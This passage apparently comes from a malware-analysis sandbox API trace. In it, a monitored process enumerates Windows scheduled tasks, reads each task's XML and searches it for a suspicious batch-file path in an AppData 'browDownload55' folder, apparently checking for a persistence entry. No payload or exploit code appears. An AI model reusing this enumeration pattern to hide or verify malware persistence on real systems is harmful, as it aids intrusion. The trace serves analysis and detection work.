D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n \\Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0163.929] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n \\Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.929] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.929] IUnknown:Release (This=0x929580) returned 0x0 [0163.929] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.932] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.932] IUnknown:Release (This=0x929580) returned 0x0 [0163.932] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.932] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x45, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.932] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.936] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.936] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.936] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="HiveUploadTask") returned 0x0 [0163.936] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT2M\r\n \r\n true\r\n true\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n \r\n PT12H\r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {BA677074-762C-444B-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0163.938] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT2M\r\n \r\n true\r\n true\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n \r\n PT12H\r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {BA677074-762C-444B-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.938] IUnknown:Release (This=0x929730) returned 0x0 [0163.938] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.938] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.941] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.941] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.941] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.941] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x46, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.941] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.944] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.944] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.944] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="WiFiTask") returned 0x0 [0163.944] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\WCM\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7578BCA33A078008\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n \r\n \r\n") returned 0x0 [0163.950] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\WCM\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7578BCA33A078008\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.950] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.950] IUnknown:Release (This=0x929580) returned 0x0 [0163.950] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.953] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.953] IUnknown:Release (This=0x929580) returned 0x0 [0163.953] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.953] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x47, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.953] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.956] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.956] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.956] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="ResolutionHost") returned 0x0 [0163.956] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n \\Microsoft\\Windows\\WDI\\ResolutionHost\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1}\r\n \r\n \r\n") returned 0x0 [0163.958] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n \\Microsoft\\Windows\\WDI\\ResolutionHost\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.958] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.958] IUnknown:Release (This=0x929580) returned 0x0 [0163.958] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.961] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.961] IUnknown:Release (This=0x929580) returned 0x0 [0163.961] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.961] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x48, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.961] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.964] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.964] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.964] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.968] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.968] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.968] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.968] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x49, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.968] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.972] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0163.972] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.972] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Windows Defender Cache Maintenance") returned 0x0 [0163.972] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41126)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCacheMaintenance\r\n \r\n \r\n") returned 0x0 [0163.974] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41126)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCacheMaintenance\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.974] IUnknown:Release (This=0x929720) returned 0x0 [0163.974] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.974] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Windows Defender Cleanup") returned 0x0 [0163.974] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41124)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCleanup\r\n \r\n \r\n") returned 0x0 [0163.977] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41124)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCleanup\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.977] IUnknown:Release (This=0x929720) returned 0x0 [0163.977] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.977] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Windows Defender Scheduled Scan") returned 0x0 [0163.977] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41127)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n Scan -ScheduleJob\r\n \r\n \r\n") returned 0x0 [0163.979] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41127)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n Scan -ScheduleJob\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.979] IUnknown:Release (This=0x929720) returned 0x0 [0163.979] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.979] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Windows Defender Verification") returned 0x0 [0163.980] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41125)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT1H\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdVerification\r\n \r\n \r\n") returned 0x0 [0163.982] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41125)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT1H\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdVerification\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.982] IUnknown:Release (This=0x929720) returned 0x0 [0163.982] IUnknown:Release (This=0x929590) returned 0x0 [0163.982] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.985] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.985] IUnknown:Release (This=0x929590) returned 0x0 [0163.985] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.985] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.985] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.992] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.992] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.992] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="QueueReporting") returned 0x0 [0163.992] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.5\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT4H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT3M\r\n \r\n \r\n 7510BCA33A0B9441\r\n 01\r\n \r\n \r\n 2015-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -upload\r\n \r\n \r\n") returned 0x0 [0163.995] StrStrIW (lpFirst="\r\n\r\n \r\n 1.5\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT4H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT3M\r\n \r\n \r\n 7510BCA33A0B9441\r\n 01\r\n \r\n \r\n 2015-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -upload\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.995] IUnknown:Release (This=0x929740) returned 0x0 [0163.995] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.995] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.996] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.996] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.996] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.996] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.996] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.997] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.997] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.997] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="BfeOnServiceStartTypeChange") returned 0x0 [0163.997] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0163.997] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.998] IUnknown:Release (This=0x929750) returned 0x0 [0163.998] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.998] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.998] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.998] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.998] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.998] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.999] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.999] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.999] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.999] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="UpdateLibrary") returned 0x0 [0164.000] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 